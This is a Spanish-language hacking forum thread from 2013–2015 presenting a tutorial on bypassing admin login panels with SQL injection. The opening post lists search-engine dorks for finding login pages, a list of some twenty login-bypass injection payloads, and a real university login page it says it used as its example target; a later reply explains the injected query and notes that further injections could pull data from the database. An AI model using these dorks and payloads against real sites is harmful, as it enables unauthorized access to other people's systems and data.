Underc0de

[In]Seguridad Informática => Bugs y Exploits => Pentesting => Mensaje iniciado por: Assed [In]Seguridad Informática en Julio 30, 2013, 11:58:38 PM

Título: [SQL] Bypass Admin Panel
Publicado por: Assed [In]Seguridad Informática en Julio 30, 2013, 11:58:38 PM
Bueno como dice hoy are un tutorial sobre el bypass admin panel (SQL) ,es decir, bypasear  panel (admin)


algunos dorks


Dorks :


inurl:adminlogin.aspx
inurl:admin/index.php
inurl:administrator.php
inurl:administrator.asp
inurl:login.asp


lo aremos con una simple consulta SQL
,,,

Acá una imagen (mía)

(http://i.imgur.com/hMDo9hp.jpg)


algunos tipos de consultas :

' or 1=1 –
1'or'1'='1
admin'–
" or 0=0 –
or 0=0 –
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1–
" or 1=1–
or 1=1–
' or a=a–
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 –
hi' or 1=1 –


Sitio que use de ejemplo : http://cpr.molsci.ucla.edu/cpr/cpr/login.asp

Bueno Un saludo Undercode  ;)
Título: Re:[SQL] Bypass Admin Panel
Publicado por: nuk3rb0mb en Agosto 13, 2015, 06:35:19 PM
Te hago una pregunta porque recien me estoy iniciando en este tema. Hacer esto en el adminlogin, de que sirve? Se que ahi estas tirando un true-false (en tu caso un 1 o "todas las verdaderas"). Pero que se obtiene de resultado? para que sirve? Que es lo que se puede conseguir?

Se entiende mi pregunta?
Saludos
Título: Re:[SQL] Bypass Admin Panel
Publicado por: blood_rec en Agosto 13, 2015, 06:46:59 PM
wow revivir un post de hace 24 meses

salu2

hermano date una vuelta en el buscador del foro de como funcionan las consultas de SQL que es una inyeccion SQL primero antes de ejecutar "ataques con dorks"  ::)

Título: Re:[SQL] Bypass Admin Panel
Publicado por: EPSILON en Agosto 14, 2015, 12:22:54 AM
@nuk3rb0mb (https://underc0de.org/foro/index.php?action=profile;u=49353) blood_rec tiene razón, la próxima vez que tengas una duda la puedes postear en el foro "Dudas y pedidos generales".
Y sobre tu duda, esta inyección SQL es por post en el form de logeo y básicamente lo que hace es dar por correcta la sentencia ingresada como clave, ya que uno es igual a uno quedando la consulta asi:

Código (mysql) [Seleccionar]
SELECT * FROM users
WHERE name='admin'
and password='' or '1'='1'


y dando el OK  te da acceso al panel, esta técnica se conoce como Login Bypass y es muy vieja.

P/D: También se podría prepara una sentencia mejor, inyectarla y hacer que nos devuelva algunos datos de  la DB más interesantes que un simple bypass.

Saludos!